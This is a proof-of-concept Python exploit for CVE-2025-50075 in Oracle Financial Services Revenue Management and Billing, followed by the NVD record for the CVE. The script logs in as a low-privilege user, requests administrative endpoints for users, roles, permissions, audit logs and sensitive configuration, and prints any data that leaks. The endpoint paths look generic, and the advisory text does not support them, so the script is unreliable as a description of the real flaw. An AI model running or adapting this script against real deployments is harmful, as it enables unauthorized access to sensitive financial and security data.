CVE-2025-50075

# CVE-2025-50075 - Oracle Financial Services Revenue Management and Billing PoC # Vulnerability: Unauthorized Data Access in Security Management System # CVSS 3.1: 6.5 (Medium) import requests from requests.auth import HTTPBasicAuth # Target configuration TARGET_URL = "https://target-oracle-fsrmb.com" USERNAME = "low_privileged_user" PASSWORD = "user_password" # Exploit: Access Security Management System component with low privileges # to retrieve critical/sensitive data that should require higher privileges def exploit_cve_2025_50075(): """ Exploit unauthorized access vulnerability in Oracle FS RMB Security Management System component. The vulnerability allows low-privileged users to access critical data through HTTP requests. """ session = requests.Session() # Step 1: Authenticate with low-privileged credentials login_url = f"{TARGET_URL}/oauth/token" auth_payload = { "grant_type": "password", "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=auth_payload, verify=False) if response.status_code != 200: print("[-] Authentication failed") return token = response.json().get("access_token") headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Step 2: Access Security Management System restricted endpoints # These endpoints should require elevated privileges restricted_endpoints = [ "/security-management/admin/users/all", "/security-management/admin/roles/all", "/security-management/admin/permissions/all", "/security-management/audit/logs", "/security-management/config/sensitive" ] for endpoint in restricted_endpoints: url = f"{TARGET_URL}{endpoint}" print(f"[*] Attempting to access: {endpoint}") # Step 3: Send request to restricted endpoint with low-privileged token response = session.get(url, headers=headers, verify=False) if response.status_code == 200: print(f"[+] SUCCESS: Unauthorized access to {endpoint}") print(f"[+] Data leaked: {response.text[:500]}") else: print(f"[-] Access denied: {response.status_code}") if __name__ == "__main__": exploit_cve_2025_50075()

{"cve": {"id": "CVE-2025-50075", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:40.173", "lastModified": "2025-10-28T16:15:45.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Revenue Management and Billing product of Oracle Financial Services Applications (component: Security Management System). Supported versions that are affected are 2.9.0.0.0-7.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Revenue Management and Billing. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Revenue Management and Billing accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.9.0.0.0", "versionEndIncluding": "7.2.0.0.0", "matchCriteriaId": "EA8187E3-E17F-4B25-B895-4A06434A5059"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}